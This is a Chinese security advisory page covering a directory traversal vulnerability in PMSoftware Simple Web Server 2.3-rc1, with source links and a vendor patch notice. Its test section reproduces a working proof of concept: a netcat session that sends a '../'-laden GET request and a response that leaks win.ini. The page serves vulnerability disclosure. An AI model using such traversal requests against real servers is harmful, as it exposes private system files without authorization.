Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / PMSoftware Simple Web Server目录遍历漏洞

发布日期:2013-01-02
更新日期:2013-01-08受影响系统:
PMSoftware PMSoftware Simple Web Server 2.3-rc1
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57143
 
PMSoftware Simple Web Server是HTTP服务器应用。
 
Simple Web Server 2.3-rc1之前版本及其他版本没有正确过滤用户的输入,通过包含 (/../) 序列的特制URL请求,可允许远程攻击者遍历系统上的所有目录。
 
<*来源:CwG GeNiuS (cwggenius@gmail.com)
 
 链接:http://xforce.iss.net/xforce/xfdb/80962
       http://www.exploit-db.com/exploits/23886/
       http://packetstormsecurity.com/files/119239/Simple-Webserver-2.3-rc1-Directory-Traversal.html
       http://osvdb.org/show/osvdb/88877
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit Title: Simple Webserver 2.3-rc1 Directory Traversal
 # Date: 01/02/2013
 # Exploit Author: CwG GeNiuS
 # Vendor Homepage: http://www.pmx.it
 # Software Link: http://www.pmx.it/download/sws-2.3-rc1-i686.exe
 # Version: 2.3-rc1 (and earlier)
 # Tested on: Windows 7 Enterprise SP1
 #
 #Vulnerability: When removing the preceding "/" from a GET
 #         request the webserver allows directory
#         traversal.
 #
 #Fix: I have spoken with the developer who has now
 # released 2.3-rc2 to correct the vulnerability  root@bt:~# nc -v 192.168.1.132 80
 192.168.1.132: inverse host lookup failed: Unknown server error : Connection timed out
 (UNKNOWN) [192.168.1.132] 80 (www) open
 GET ../../../../../../../../windows/win.ini http/1.1 HTTP/1.1 400 Bad Request
 Server: PMSoftware-SWS/2.3
 Date: Wed, 02 Jan 2013 22:45:2 GMT
 Connection: close HTTP/1.1 200 Ok
 Server: PMSoftware-SWS/2.3
 Date: Wed, 02 Jan 2013 22:45:2 GMT
 Accept-Ranges: bytes
 Content-type:
 Content-Length: 403 ; for 16-bit app support
 [fonts]
 [extensions]
 [mci extensions]
 [files]
 [Mail]
 MAPI=1
 [MCI Extensions.BAK]
 3g2=MPEGVideo
 3gp=MPEGVideo
 3gp2=MPEGVideo
 3gpp=MPEGVideo
 aac=MPEGVideo
 adt=MPEGVideo
 adts=MPEGVideo
 m2t=MPEGVideo
 m2ts=MPEGVideo
 m2v=MPEGVideo
 m4a=MPEGVideo
 m4v=MPEGVideo
 mod=MPEGVideo
 mov=MPEGVideo
 mp4=MPEGVideo
 mp4v=MPEGVideo
 mts=MPEGVideo
 ts=MPEGVideo
 tts=MPEGVideo
  
GET ../../../../../../../../windows/win.ini http/1.1建议:
--------------------------------------------------------------------------------
厂商补丁:
 
PMSoftware
 ----------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
http://www.pmx.it/software/product.asp?id=1e107 "e107_admin/download.php"跨站请求伪造漏洞e107 "/e107_admin/newspost.php"跨站请求伪造漏洞相关资讯      目录遍历漏洞 
  • Oracle GlassFish Web Space   (03/14/2013 15:01:43)
  • NetIQ Privileged User Manager   (12/27/2012 17:13:16)
  • CoDeSys Control服务CmbWebserver.  (12/01/2012 09:28:07)
  • Schmid Watson Management Console  (01/13/2013 07:45:35)
  • EMC Data Protection Advisor目录  (12/27/2012 08:27:01)
  • PRADO "functional_tests.php" sr  (11/28/2012 06:50:13)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图